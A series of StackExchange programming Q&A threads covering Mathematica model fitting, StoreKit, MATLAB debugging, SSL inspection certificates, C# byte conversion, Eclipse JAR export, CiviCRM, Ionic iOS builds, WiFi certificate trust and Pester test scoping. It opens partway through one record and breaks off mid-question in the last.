example?\nComment: Sorry, but I only know approximate values because the data was obtained through a function that does not contain explicitly the same parameters. May I upload a new dataset here? I could provide you simulated data if you wish.\nComment: @belisarius. I added a new data set obtained from a simulation of the model. 
Now, I'm trying to reformulate the problem using ParametricNDSolve and the performance seems to be getting better. I'll notify here if the problem is fixed.\nAnswer: After trying many ways to fit the -numerically solved- model described above, with lots of help from fellows, it turned out that -for this kind of model at least- fitting is much faster if ParametricNDSolve is used, instead of NDSolve, to solve the ODEs of the model. This is just what 'Guess who it is' slightly suggested in a comment to my original question.\nI just give an example based on the original model comparing the two procedures.\nModel to be fitted:\nBasically, the model is:\n<code> X'[t]=m[t].X[t],\n X[t_]={h[t],r[t],rh1[t],rh2[t],rh3[t]} (* vector of concentrations of species of the modeled chemical reaction *)\n m[t_] := {{-k1*r[t], 0, ki1, 0, 0}, {0, -k1*h[t], ki1, 0, 0}, {0, \nk1*h[t], -(ki1 + k2), ki2, 0}, {0, 0, k2, -(ki2 + k3), ki3}, {0, \n0, 0, k3, -ki3}} (* the so called 'kinetic matrix' of the system *)\n<\/code>\nAnd the quantity measured (to be fitted to experimental values) is:\n<code>F = {0,aR,aRH1,aRH2,aRH3}.X[t]\n<\/code>\nImplementation of the model and fitting:\nThe model is formulated below using NDSolve or ParametricNDSolve.\n<code>Clear[F, Xsol, G, Ysol];\nX[t_] := {h[t], r[t], rh1[t], rh2[t], rh3[t]};\nm[t_] := {{-k1*r[t], 0, ki1, 0, 0}, {0, -k1*h[t], ki1, 0, 0}, {0, k1*h[t], -(ki1 + k2), ki2, 0}, {0, 0, k2, -(ki2 + k3), ki3}, {0, 0, 0, k3, -ki3}};\n (* Fixed parameters for this example *)\naR = 0; k2 = 0.347; ki2 = 0.0235; k3 = 0.0507; ki3 = 0.00645; ht = 800; rt = 20;\n(* Solving of ODEs *)\nXsol = ParametricNDSolve[{X'[t] == m[t].X[t], X[0] == {ht, rt, 0, 0, 0}}, X[t], {t, 0, 500, 0.01}, {{k1, 0.0001, 0.1}, {ki1, 0.1, 100}, {k2, 0.0001, 10}, {ki2, 0.00001, 10}, {k3, 0.00001, 10}, {ki3, 0.00001, 10}, {ht, 1, 10000}, {rt, 1, 1000}}]\nYsol := NDSolve[{X'[t] == m[t].X[t], X[0] == {ht, rt, 0, 0, 0}}, X[t], {t, 0, 500, 0.01}]\n\n(* Quantity to be fitted *)\nF[k1_?NumberQ, ki1_?NumberQ, k2_?NumberQ, ki2_?NumberQ, k3_?NumberQ, ki3_?NumberQ, aR_?NumberQ, aRH1_?NumberQ, aRH2_?NumberQ, aRH3_?NumberQ, t_?NumberQ, rt_?NumberQ] := (F[k1, ki1, k2, ki2, k3, ki3, aR, aRH1, aRH2, aRH3, ht, rt] = \nFunction[{tu}, {0, aR, aRH1, aRH2, aRH3}.Through[(X[t] \/. Xsol)[k1, ki1, k2, ki2, k3, ki3, ht, rt]] \/. t :> tu])\n\nG[k1_?NumberQ, ki1_?NumberQ, k2_?NumberQ, ki2_?NumberQ, k3_?NumberQ, ki3_?NumberQ, aR_?NumberQ, aRH1_?NumberQ, aRH2_?NumberQ, aRH3_?NumberQ, ht_?NumberQ, rt_?NumberQ] := (G[k1, ki1, k2, ki2, k3, ki3, aR, aRH1, aRH2, aRH3, ht, rt] = \nFunction[{tu}, Evaluate[{0, aR, aRH1, aRH2, aRH3}.Flatten[X[t] \/. Ysol]] \/. 
t :> tu])\n<\/code>\nThe data for the example was:\n<code>data = Table[{t, 0.22 (1 - E^(-7.25 t)) + 0.10 (1 - E^(-0.084 t)) + 0.15 (1 - E^-0.027)}, {t, 0, 500}]\n<\/code>\nThe fitting was run as follows:\n<code> Clear[FitF, FitG]\n Timing[FitF = NonlinearModelFit[data500, F[k1, ki1, k2, ki2, k3, ki3, aR, aRH1, aRH2, aRH3, ht, rt][t], {{k1, 0.001}, {ki1, 7}, , {aRH1, .032}, {aRH2, .01}, {aRH3, .012}}, t]]\n Timing[FitG = NonlinearModelFit[data500, G[k1, ki1, k2, ki2, k3, ki3, aR, aRH1, aRH2, aRH3, ht, rt][t], {{k1, 0.001}, {ki1, 7}, , {aRH1, .032}, {aRH2, .01}, {aRH3, .012}}, t]]\n<\/code>\nThe output gave the same set of parameter values (along with some NDSolve's warnings):\n<code> {k1 -> 0.000991454, ki1 -> 7.00047, Null -> 1., aRH1 -> 0.117238, aRH2 -> 0.0278981, aRH3 -> 0.0189699}\n<\/code>\nBut very different timings: ~ 23 s for the 'ParametricNDSolve'-model (F), and ~ 1128 s for the 'NDSolve'-model. That is, a 50 fold difference. (I must mention that such difference in timing was also observed in other formulations I tried in which no warnings or errors were prompted)\nUsing the ParametricNDSolve strategy, the simultaneous fitting of 9 parameters of the model to 9 curves of about 14000 points each, converged very well and it took about 3600 s (1 hour). That's really fine. Now we are talking.\nMaybe the convenience of using ParametricNDSolve is obvious for many -it is not for a beginner as me-, but I think it deserves some discussion, at least for future reference for a new beginner.\n","meta":{"source":"mathematica.stackexchange","title":"How to speed up NonlinearModelFit applied on a NDSolve solution?","dup_signals":{}},"subset":"stackexchange"} +{"text":"How long will store kit keep unfinished transactions?\n\nQuestion: I'm working on this app with in app purchase enabled.\nThe happy path is all covered, everything is fine, I'm trying to work out the non happy path.\nTo put it simply, the purchase is bound to a server side component.\nOn purchase, when the transaction is in the \"Purchased\" state, I'm supposed to go out to the server, which will enable the user's account.\nWhen the request comes back, I then clean up some stuff and eventually call -finishTransaction: on the SKPaymentQueue.\nThe non happy path is pretty much when the server call fails for whatever reason. Network not available, network timeout, the user closed the app right after purchasing it and just before I could make the server call, you name it.\nMy tests in the 5.1 simulator with a sandbox account show me that an unfinished Purchased transaction will come back in the queue on next start up, and my delegate will be properly called with it.\nBut, after a little while, say 5 minutes for instance, boom, gone is the transaction.\nConsidering the whole stability of sandbox accounts, I'm willing to call that on the simulator's implementation, but it's hard to tell.\nWhat's the appropriate way of dealing with this problem?\nBonus question: when does apple actually charge somebody? Sounds like it should be AFTER the app called -finishTransaction:, but I couldn't find any evidence of this anywhere.\nThanks,\n\/kra\nUPDATE:\ntesting on physical device, almost an hour and the transaction is still there. Looks like the transactions disappearing is a simulator thing.\nAnswer: When I implemented In-App purchases I gave up on testing it in the simulator. The behavior is just too different. Test it on the device and see whether it works there. 
\nI'm also interested in your question about the charging, since I'm not entirely sure about it either (my app isn't released yet ;) ). \nComment: Thanks for your answer. That's pretty much the conclusion I'm getting to, sandbox is completely unreliable, and you have to take a leap of faith before going to prod. Some earlier tests on device tipped me that they would always come back (and a bit of common sense indicates that too). Testing on devices isn't exactly reliable either, I've had my share of uninstall, reboot, reinstall thanks to store kit freaking out with the dreaded \"Can't reach the appstore\" error.\nComment: I have to say that I didn't really get into too much trouble when testing on the device. I followed this guide very closely: http:\/\/troybrant.net\/blog\/2010\/01\/in-app-purchases-a-full-walkthrough\/. The only thing that bugs me sometimes, is that it returns invalid product id's after doing some recompiles - when that happens I just have to delete and build\/run again though. The whole code-sign relation to product id's is also still magic for me - for example I don't get why it works when doing an adhoc-testrollout with the debug signing.\nComment: Yeah, that part is pretty much ok, my problem was more with switching between sandbox accounts. At some point, StoreKit just gives up, constantly returns a phony error no matter what you do, and you pretty much have to uninstall\/reboot the phone\/reinstall. I don't recall any issue with the code signing, you just have to be careful to use a specific provisioning profile, not a wildcard one. As long as the items are available, it should work regardless of the cert.\nComment: Yeah see, here is the thing: For the ad-hoc test provisioning on the other hand I do need the wildcard one. For some reason it seems that two provisioning profiles are active since both aspects work: I can give testers the app and they can test the In-App store. It makes sense but I'm confused why it works.\n","meta":{"source":"stackoverflow","title":"How long will store kit keep unfinished transactions?","dup_signals":{}},"subset":"stackexchange"} +{"text":"conditional dbstop to locate where variable becomes negative\n\nQuestion: I realise that this has been brought up before; but I am hoping that someone can clarify something for me.\nOne of my variables is being calculated as a negative number at some point during my model run..however, this is a mistake (they can only be positive numbers). So I need to locate where this is happening a trace where the source of error is being produced.\nThe model is too large to do this manually, so I was hoping to use dbstop in some guise. I realise from reading the posts here that it is not simply a case of giving a condition (dbstop in test.m if var<0); so I was hoping to use a conditional if statement to display an error (disp 'error'), which I could use in: dbstop in test.m if error.\nHowever; what I am getting back is:\n'Breakpoint expression 'error' resulted in an error. The error was Error using==>error\nToo many output arguments.'\nCan anyone suggest a way for me to isolate when my variable is becoming negative?\nComment: Can you post the actual code you are using to display the error, including the conditional if statement? 
It sounds to me like you are doing the right thing, but you may have a bug in that section of code.\nComment: This is the sample code I was messing with to see if I could get it to stop:for i=(1:10);\n dbstop in 'db_test.m' if error;\n a=[20:30];\n b=[20:2:40];\n c(i)=a(i)-b(i);\n if c(i)<0;\n disp error;\nend\nend So, I was hoping it would put in a stop point when i=2...but it doesn't...even though it is displaying the 'error'. Am I doing something stupid?\nComment: @matlab_newby but there is no error when `i=2`. try `assert(c(i)>=0)` just after your `if..end`\nComment: I think the issue is that you are calling `dbstop in 'db_test.m' if error` within your loop within `db_test.m` itself. Instead, run `dbstop in 'db_test.m' if error` from the command window and then run the file \u2013 you might need to run `dbclear db_test.m` first.\nAnswer: You could try <code>dbstop if error<\/code> and then in your code <code>assert(var>=0)<\/code> at the point where you think it might be becoming negative (i.e. throw an error if it is not)\nComment: I've never used the 'assert' command before..it could be useful..but I have no idea where the variable is becoming negative. It is nested within a nested loop. I'll look into that command though a bit more. Thanks\nComment: How often does it change values (in how many lines of code) within those loops? Or else just place it at the end of a loop and then you can check the loop state and set a normal conditional break point\nComment: it changes value daily for 140 years of daily input. I can't place it at the end of the loop either due to the fact that other variables are dependant on its value (which needs to be calculated first). If I could place it at the end though; what do you mean by 'set a normal conditional breakpoint'?'dbstop if error'?\nComment: You can place it at the end. I mean when you enter debug mode, check the values of the looping variables and then set a [conditional breakpoint](http:\/\/www.mathworks.com\/help\/matlab\/matlab_prog\/debugging-process-and-features.html#brqxeeu-234) to stop at the beginning of the loop at those values so you can just step through that one loop iteration where your variable goes negative and see exactly where it happens.\nComment: But when I said how often does it change, I mean how often in terms of lines of code. How many times do you assign or alter it's value? Just put the assert directly after those lines. I doubt it will be many.\nComment: that worked. That's great.As you said, I put in the assert(var(i)>=0) after the variable had been calculated. Many thanks\n","meta":{"source":"stackoverflow","title":"conditional dbstop to locate where variable becomes negative","dup_signals":{}},"subset":"stackexchange"} +{"text":"Use of server and root certificate in ssl termination and inspection\n\nQuestion: I'm researching vendors which allow SSL termination and inspection, I came across Cisco CWSA technology, the technology was somewhat easy to understand the stuff which really boggled my mind was the difference between <code>root<\/code> and <code>server<\/code> certificate. \nThis article mentions: \n\nA Server certificate cannot be used in order to sign other\n certificates; therefore, HTTPS decryption does not work if a Server\n certificate is installed on the WSA.\n\nI'm mean if that certificate is signed by root CA, then why it can't go there on appliance for decryption? I'm missing something here. 
Help guys.\nAnswer: There's a difference between the capabilities of a \"root\" certificate, which can be used to sign other certificates, and a \"server\" certificate, which cannot.\nFor an SSL proxy, if you use a server certificate then the only host whose traffic could be seamlessly intercepted is the one whose Common Name is included on the server cert.\nThe general idea with this kind of SSL intercepting proxy is that you'll have a CA certificate which will be trusted by the clients connecting through the proxy and which can be used to create server certificates that the clients will trust, on-the-fly.\nComment: well you can, but it wouldn't be a lot of use as it'd only decrypt traffic for one server :) I don't know for sure why Cisco would block this, but my guess would be that if the product is intended for use as a general SSL proxy, it will only serve that function effectively with a root cert deployed to it, so they're writing their documentation from that perspective.\nComment: Thanks @Rory for the reply. So, technically speaking, you can use a server certificate to decrypt. Why has Cisco then made it sound impossible?\nComment: You have a point, but what about inbound SSL decryption instead of outbound, where for Gmail, Facebook, Skype and the like more application control and policing is required? In my case it's just one server which needs to be inspected for layer 7 attacks.\nComment: well as I say, I don't know the product; my guess was it would be intended for outbound rather than inbound, so that may be their reasoning. In my experience, inbound to a web app, for example, tends to be done by a different class of product (e.g. a WAF), although it is similar work being done...\n","meta":{"source":"security.stackexchange","title":"Use of server and root certificate in ssl termination and inspection","dup_signals":{}},"subset":"stackexchange"}
+{"text":"Convert any type of array to byte[] of variable length in c#\n\nQuestion: I am trying to write a generic method which converts any type of array to a byte array. \n<code>method definition:\n\n public byte[] convert_item_to_bytes(dynamic items)\n {\n byte[] bytearr = ??\n \/\/I tried BlockCopy, but I am not getting the correct number of elements\n \/\/Buffer.BlockCopy(items, 0, bytearr, 0, items.Length );\n\n return bytearr;\n }\n\nexamples of my method calls:\n\n convert_item_to_bytes(new Int16[]{0x1234, 0x4567, 0x9574});\n convert_item_to_bytes(new Int32[]{0x3545, 0x3352, 0x9642, 0x5421});\n convert_item_to_bytes(new UInt64[]{0x4254, 0x8468});\n \/\/etc.... my method calls can also be of float type.\n<\/code>\nI am using dynamic in the definition because I only get to know the type at runtime. \nPS: I saw another example which uses BinaryFormatter and MemoryStream. I do not want to use that. (How to convert byte array to any type)\nIs there any other possible way to solve this?\nComment: You can answer this if you know **how** you can \"convert\" any arbitrary object to a byte array. The premise as-is is quite nonsensical, as you _will_ have to resort to binary serialization, which is exactly what the BinaryFormatter is for. 
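For illustration, a rough sketch of that serialization route (only a sketch: it assumes the element type is serializable, and the output contains type metadata rather than only the raw element bytes) could look like:\n<code>using (var ms = new System.IO.MemoryStream())\n{\n var formatter = new System.Runtime.Serialization.Formatters.Binary.BinaryFormatter();\n formatter.Serialize(ms, items); \/\/ 'items' is the input array from the question\n byte[] bytes = ms.ToArray(); \/\/ serialized payload, including type information\n}\n<\/code>\n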
If \"any type of array\" actually means \"any numeric type of array\" it [becomes a bit easier](https:\/\/msdn.microsoft.com\/en-us\/library\/system.bitconverter.getbytes(v=vs.110).aspx).\nComment: I'd look into the [BinaryWriter](https:\/\/msdn.microsoft.com\/en-us\/library\/system.io.binarywriter(v=vs.110).aspx?f=255&MSPPError=-2147217396)\/[BinaryReader](https:\/\/msdn.microsoft.com\/en-us\/library\/system.io.binaryreader(v=vs.110).aspx) classes.\nAnswer: There are quite a few issues with what you're actually asking, especially if you don't want to write code per type. Luckily there aren't that many numeric types in the BCL, so you could write it all out once or even let it be generated.\nA very naive approach is shown below:\n<code>public static void Main()\n{\n int[] intArray = new int[] { 1, 2, 42, };\n int singleItemSize = sizeof(int);\n\n byte[] intOutput = ConvertToByteArray(intArray, singleItemSize);\n\n for (int i = 0; i < intOutput.Length; i++)\n {\n Console.Write(\"{0:x2} \", intOutput[i]);\n if ((i + 1) % singleItemSize == 0)\n {\n Console.WriteLine();\n }\n }\n}\n\nprivate static byte[] ConvertToByteArray<T>(T[] input, int singleItemSize)\n where T : struct, \n IComparable, \n IComparable<T>, \n IConvertible, \n IEquatable<T>, \n IFormattable\n{\n var outputArray = new byte[input.Length * singleItemSize];\n\n \/\/ Iterate over the input array, get the bytes for each value and append them to the output array.\n for (int i = 0; i < input.Length; i++)\n {\n var thisItemBytes = GetBytes(input[i]);\n Buffer.BlockCopy(thisItemBytes, 0, outputArray, i * singleItemSize, singleItemSize);\n }\n\n return outputArray;\n}\n\nprivate static byte[] GetBytes<T>(T input)\n where T : struct, \n IComparable, \n IComparable<T>, \n IConvertible, \n IEquatable<T>, \n IFormattable\n{\n if (typeof(T) == typeof(int))\n {\n return BitConverter.GetBytes(Convert.ToInt32(input));\n }\n else if (typeof(T) == typeof(float))\n {\n return BitConverter.GetBytes(Convert.ToSingle(input));\n }\n else\n {\n throw new ArgumentException(\"T\");\n }\n}\n<\/code>\nThis outputs the following (depending on your system's endianness):\n<code>01 00 00 00 \n02 00 00 00 \n2a 00 00 00 \n<\/code>\nAnd so the ConvertToByteArray() method delivers a useless array of 12 bytes given the input of int[] { 1, 2, 42 }. It is useless because you don't know whether that array contains 12 bytes, 6 chars, 3 ints, 3 floats or 3 unsigned integers. \nApart from that, there are a lot of (performance) problems with the shown code, which I'm sure can be simplified. \nInstead perhaps you can find another solution for this seemingly XY problem.\nComment: I'll check (it's been a while) to see what version I may have had problems with the `struct` constraint.\nComment: Which version of C#\/.Net are you using? The only reason I ask is because of the `struct` constraint on the `ConvertToByteArray` method. I thought that would not compile in versions earlier than C# 6.\nComment: @IAbstract compiled using IdeOne, C# 5 and .NET 4.5 AFAIK.\nComment: @IAbstract alright. As far as I know it has always worked, but feel free to enlighten me!\nComment: @CodeCaster I will try your code. I am using .NET 4.5. The reason I want to convert to a byte array is to transfer it to another tool. So is it simpler and faster to use BinaryFormatter and MemoryStream?\nComment: I have many parameters to convert. 
So, I want to put everything into a byte array and then transfer it.\n","meta":{"source":"stackoverflow","title":"Convert any type of array to byte[] of variable length in c#","dup_signals":{}},"subset":"stackexchange"} +{"text":"Why Eclipse Export -> Executable Jar does not provide choice of classes to include?\n\nQuestion: If you use Eclipse then you can Export a project to jar with right-button click -> Export and then you have a choice of <code>Jar\/Executable Jar<\/code>.\nWell I need to create Executable Jar but then I have no flexible choice of files to include in the JAR as I do have with just Jar option. Why is that?\nJava Eclipse: Difference between exporting as a JAR and exporting as a Runnable JAR\nAnswer: Export as 'Executable Jar' will take a launch configuration and pack everything that is needed for the launch into a Jar, so selecting the files to include is not necessary there. It is a convenience functionality from Eclipse to quickly create ready-to-go executable jars with only a click.\nExport as 'Jar' will give you the choice of selecting the resources that you want to have in the Jar. It will also allow you to specify a main class and will then create an executable Jar by creating the necessary manifest file. (Just follow the 'export jar' wizard to the last page, at the bottom you will find an input box for selecting the main class. Selecting one will create an executable jar)\nRemember: An executable Jar is just a normal Jar with a MANIFEST.MF file that specifies the main class to call when executed.\n","meta":{"source":"stackoverflow","title":"Why Eclipse Export -> Executable Jar does not provide choice of classes to include?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Where to put api wrapper class in an extension\n\nQuestion: I just wrote an extension with short-name \"genderselfidentify\" (it's cool, you should check it out), which implements hook_civicrm_apiWrappers. This hook requires you to declare a class for your api wrapper functions, but the docs for it don't say exactly what you should name the class or where you should put it. The example given is:\n<code>function example_civicrm_apiWrappers(&$wrappers, $apiRequest) {\n $wrappers[] = new api_v3_APIWrapperExample();\n}\n<\/code>\nWhich implies that\n\nThe class name should start with <code>api_v3_<\/code>\nIt should be placed in the extension's <code>api\/v3<\/code> directory\n(noting the lack of <code>require_once<\/code> in the example) it will be autoloaded by CiviCRM.\n\nI found all the above to be true, naming my class <code>api_v3_GenderselfidentifyAPIWrapper<\/code> the autoloading and wrapper functionality worked great... but then I noticed something strange in the API Explorer:\n\nWhy is my wrapper class showing up as if it were an entity?\nAnswer: The example in the wiki was problematic. If you look at the wrappers included with core, they're never placed under the <code>api\/v3<\/code> folder -- they're always under <code>CRM\/Utils\/API<\/code>. (I've updated the wiki to use a different name.)\nThat's merely a matter of convention, though. The API-wrapper system doesn't impose any constraints on where to put the class or how to name it. As far as that system is concerned, you can use any valid PHP class (as long as it implements the <code>API_Wrapper<\/code> interface).\nThe limitation here is in the reflection mechanism (<code>MagicFunctionProvider->getEntityNames()<\/code> and <code>getActionNames()<\/code>) which maps between API entities\/actions and files\/folders\/functions. 
This is tricky to do because the naming conventions have been traditionally loose\/ambiguous, so the current implementation uses a general rule of thumb: if you put any PHP file under \"api\/v3\", then it will be reported as an entity name.\n","meta":{"source":"civicrm.stackexchange","title":"Where to put api wrapper class in an extension","dup_signals":{}},"subset":"stackexchange"} +{"text":"Generating an array using list values at indices corresponding to entries in a separate list satisfying some criterion\n\nQuestion: Imagine one has an array of integer value sets that looks like this:\n<code>testValues = {{9, 8, 8, 10, 1}, {10, 0, 0, 1, 0}, {8, 0, 0, 5, 7}, {1, 5, 7, 2, 7}, {6, 9, 3, 9, 10}, {7, 10, 7, 5, 3}, {3, 10, 6, 1, 9}, {5, 8, 7, 9, 2}, {2, 3, 2, 7, 0}, {3, 7, 10, 2, 7}};\n<\/code>\nAnd a set of lists that looks like this:\n<code>listA = {1,2,3,4,5,6,7,8,9,10};\nlistB = {1,2,3,4,5};\nlistR = {{67,56,55,33,24,32,54,667,99,103498},{5}};\nlistQ = {{653,29,49,69,19},{20987}}\n<\/code>\nHere, <code>Length[listA] == Length[listR[[1]]]<\/code>, <code>Length[listB] == Length[listQ[[1]]]<\/code>, and the number of entries in <code>testValues<\/code> is <code>Length[listA]*Length[listB]<\/code>.\nI want to very quickly output an array with entries:\n<code>{{listR[[a, 1]], listQ[[b, 1]]},...}\n<\/code>\nFor all <code>{a,b}<\/code> pairs where <code>testValues[[a,b]] >= threshold<\/code> for some integer <code>threshold<\/code> value. The entries in the array do not need to be in any particular order.\nThe naive way of proceeding could look like:\n<code>outputList ={};\n\nFor[a = 1, a <= Length[listA], a++,\n For[b = 1, b <= Length[listB], b++,\n\n If[testValues[[a, b]] >= threshold,\n outputList = Append[outputList, {listR[[a, 1]], listQ[[b, 1]]}];\n ];\n\n ];\n ];\n<\/code>\nHowever, this is quite slow. Is there a much faster method using <code>Select<\/code> perhaps? \nThe relevant list sizes are in reality something like <code>Length[listA]<\/code> $\\approx 10^2$, <code>Length[listB]<\/code> $\\approx 10^4$, and <code>testValues<\/code> has <code>Length[listA]*Length[listB]<\/code> entries.\n\nUpdate:\nI was able to use Position to do the following:\n<code>goodIndices = Position[int, x_ \/; x >= 3];\noutputList[[i]] = {listR[[#[[1]], 1]], listQ[[#[[2]], 1]]} & \/@ goodIndices;\n<\/code>\nThis is about 4x faster than the naive approach I posted earlier. Are further speedups possible?\nComment: I don't see the definition of listA, listB and listR, listQ.\nComment: In any case, you could play with DeleteCases function with `levelspec` 2\nComment: @VahagnPoghosyan I've added explicit examples for all of the lists.\nAnswer: Here is a straightforward functional transformation of your <code>For<\/code> loop which should be faster:\n<code>pairs = Select[Tuples[{listA, listB}], Extract[testValues, #] >= threshold &];\noutputList = Table[{listR[[First[p], 1]], listQ[[Last[p], 1]]}, {p, pairs}];\n<\/code>\nComment: Hmm, this doesn't seem to perform similarly? I'm getting position specification errors for different examples?\nComment: For your example the code produces the exact same output as your for loop.\n","meta":{"source":"mathematica.stackexchange","title":"Generating an array using list values at indices corresponding to entries in a separate list satisfying some criterion","dup_signals":{}},"subset":"stackexchange"} +{"text":"Ionic - build iOS package file for testing on device\n\nQuestion: Currently I am trying to build a new app with Ionic 3. 
I am looking for steps to build a file for installation, which has the same functionality as an APK file for Android devices. I don't know whether it should be an IPA file or some other file type, as I have never used an iPhone or iPad myself before. Right now, I have a free developer account registered with my Apple ID.\nWhat I can find on the web seems to only allow developers to build apps for testing on real devices which the developers have access to. To be more specific, I always see people say that users should plug in the device via USB and pick the target device in Xcode under the \"Scheme\" drop-down selector. I tried to follow the steps provided by others, but it always ended up with an error in Xcode, either related to a code signing error or to the device not being registered in my developer account.\nWhat if I do not own any iOS devices? What I have is only a single MacBook for coding. I would like to prepare a file and send it to my friends, and let them install my app with that file on their iOS devices.\nI am using Xcode 9 and Ionic 3.\nAnswer: In iOS you cannot do that. If you want to send your app to your friends for testing, you have to build the app with <code>ionic cordova build ios<\/code> and then open the project in Xcode and build\/upload your project to your Apple developer account.\nAfter that, you have to use TestFlight to share your app for testing.\n","meta":{"source":"stackoverflow","title":"Ionic - build iOS package file for testing on device","dup_signals":{}},"subset":"stackexchange"}
+{"text":"How to distinguish between Wifi certificate and certificate usable for MITM?\n\nQuestion: I know that similar questions have been asked several times, but this question focuses on one aspect I have not found answered yet.\nRecently, when I was connecting my iPhone to my school WiFi (eduroam), it asked me to trust a WiFi certificate. How do I differentiate between those that are able to MITM me and those that aren't? Are there any parameters\/descriptions in the details of the certificate that make them distinct?\nThe certificate I was presented with was:\n<code>\n>Issuer Name\n>Organization: QuoVadis Limited\n>Common Name: QuoVadis Global SSL ICA G3\n\n>Basic Constraints\n>Critical: No\n>Certificate Authority: No\n\n>Certificate Authority Info Access\n>Critical: No\n>Access Method: CA Issuers\n>URI: http:\/\/trust.quovadisglobal.com\/qvsslg3.crt\n>Access Method: Online Certificate Status Protocol\n>URI: http:\/\/ocdp.quovadisglobal.com\n\n>Extended Key Usage\n>Critical: No\n>Purpose: Client Authentication\n>Purpose: Server Authentication\n\n>Key Usage\n>Critical: No\n>Usage: Digital Signature, Key Encipherment \n\n<\/code>\nComment: *\"I know this question has been asked several times, but I want to make sure that it is OK.\"* - Why do you think that asking again will lead to different answers? Since you are aware of the other questions, please only ask the parts which are not already answered in the other questions. In short: properly installed, this certificate is usable for authentication against the WiFi network only. It will not allow anyone to actively MITM TLS traffic. 
Of course, connecting to any network will allow the network operators to passively monitor traffic, but not to actively MITM TLS.\nComment: @SteffenUllrich , What i m asking is how do I differentiate which certificate will allow the operators to MITM me and which will only allow for authentication purposes only.\nComment: Then please show your current understanding based on existing answers and reduce your question to exactly this point you feel not answered yet. But in short: The difference is not in the certificate but how you install it: if you install it for authentication of the WiFi only then it can only be used for this. If you install it as a generic root CA trusted for everything then it will be usable for active TLS MITM too.\nComment: @SteffenUllrich Thank you for the advice, I have edited the question. Yes, how should I differentiate between two certificate when installing them? How do I know one is for authentication purposes only and one is installing myself a root CA? Thanks\nComment: I've changed your question and title to be more focused on what I understand you want to know. Hope this fits your problem.\nComment: @SteffenUllrich Thank you. When you mean passively monitor my traffic, if I browse on https, does that mean my school can see what I am browsing (domain), but not the content of what I am browsing (sensitive info, chat msg,etc)? Sorry if the terms used are not precise.\nComment: You school can not see the exact content on HTTPS, but can make some assumptions about it. See [Are URLs viewed during HTTPS transactions to one or more websites from a single IP distinguishable?](\/a\/4418\/37315) or [My ISP uses deep packet inspection; what can they observe?](\/a\/155060\/37315).\nAnswer: \nHow do I differentiate between those that are able to MITM me and those that aren't? Are there any signs\/description on the usage of the certificate that makes them distinct?\n\nCA certificates usable for MITM and usable as trust anchor in WiFi authentication are not really different. The difference is how these certificates are installed in the device: If they are specifically installed for authentication against a WiFi network only, then they will be only used for this purpose. If they are instead installed as a general purpose CA then they will also be used as a trust anchor in web traffic and other TLS connections and thus can be used for actively MITM TLS traffic.\nBut note that in your specific case you are not dealing with a CA certificate at all. You are only asked to install the leaf certificate specific for your current network. This can be seen from:\n\nCertificate Authority: No\n\nA CA certificate would have a \"Yes\" here and only a CA certificate is able to issue other certificates as needed in active TLS MITM attacks.\nComment: Is there any way for me to identify whether a particular certificate is for authentication purpose or general purpose CA? Or is there a way for me to differentiate the type of installation?\nComment: @mxmx: See updated answer about your specific certificate. In general: have a look at the certificate management on your device. 
For example current Android versions clearly distinguish between CA certificates, VPN certificates and WiFi certificates.\nComment: @mxmx In iOS CA certificates have to be explicitly to be activated as trusted root CA certificate https:\/\/support.apple.com\/en-in\/HT204477\nComment: @Robert meaning even if I installed CA certificates, but do not explicitly activate them in the settings, it won't have any effect?\nComment: @mxmx I am not sure what effects an CA certificate has that is just installed, but unless you explicitly trust it it does not have any effect on SSL\/TLS connections by apps or the system itself.\n","meta":{"source":"security.stackexchange","title":"How to distinguish between Wifi certificate and certificate usable for MITM?","dup_signals":{}},"subset":"stackexchange"} +{"text":"PowerShell: Pester Unit Test with Before\/After Blocks\n\nQuestion: I'm learning to do Unit Tests with Pester and I am having a strange problem with the Before\/After blocks. My Unit Test code is below:\n<code> Describe \"Before\/After Blocks\" {\n\n Context \"BeforeEach\/AfterAll\" {\n\n BeforeAll {\n $value = 0\n Write-Host \"->Initial value is $value\"\n }\n\n BeforeEach {\n $value++\n }\n\n It \"value is 1\" {\n $value | Should -Be 1\n }\n\n It \"value is 2\" {\n $value | Should -Be 2\n }\n\n It \"value is 3\" {\n $value | Should -Be 3\n }\n\n AfterAll {\n Write-Host \"->Final value is $value\"\n }\n }\n }\n<\/code>\nWell, as you can see in the code, my purpose is to initializate a variable and see how it gets incremented by the BeforeEach block. This is the output:\n\nContext BeforeEach\/AfterAll\n->Initial value is 0\n<code>[+] value is 1 \n\n[+] value is 2 \n\n[+] value is 3 \n<\/code>\n->Final value is 0\n\nThe variable is initialized to 0 and before any It Block it's incrementing cause the assertions didn't fail. But the AfterAll block says the variable value is 0, the initial value and not 3 as I expect.\nWhy?\nThanks.\nAnswer: The problem seems to be to be that the <code>AfterAll<\/code> block has its own scope (which I agree is a bit odd). You can get the result you expect by using global variables, although this isn't particularly great practice:\n<code>Describe \"Before\/After Blocks\" {\n\n Context \"BeforeEach\/AfterAll\" {\n\n BeforeAll {\n $global:value = 0\n Write-Host \"->Initial value is $value\"\n }\n\n BeforeEach {\n $global:value++\n }\n\n It \"value is 1\" {\n $global:value | Should -Be 1\n }\n\n It \"value is 2\" {\n $global:value | Should -Be 2\n }\n\n It \"value is 3\" {\n $global:value | Should -Be 3\n }\n\n AfterAll {\n Write-Host \"->Final value is $global:value\"\n }\n }\n}\n<\/code>\n","meta":{"source":"stackoverflow","title":"PowerShell: Pester Unit Test with Before\/After Blocks","dup_signals":{}},"subset":"stackexchange"} +{"text":"Compile-time usage introspection\n\nQuestion: I have been trying to come up with a solution to this problem for a while and so far, everyone told me it was impossible around me so I though I'd give SO a try. \nHere is the problem : people using environment variables and not properly either testing for the result or silently using hard-coded alternative. \nWhat I wanted to do was come up with a small library that people would use instead of getenv that could, at initialization time, inform the user of the env. variables the program might be using. This would only imply doing a replace of getenv for this call and placing a single function call at the initialization of the executable or library (I would not deal with dynamic env. 
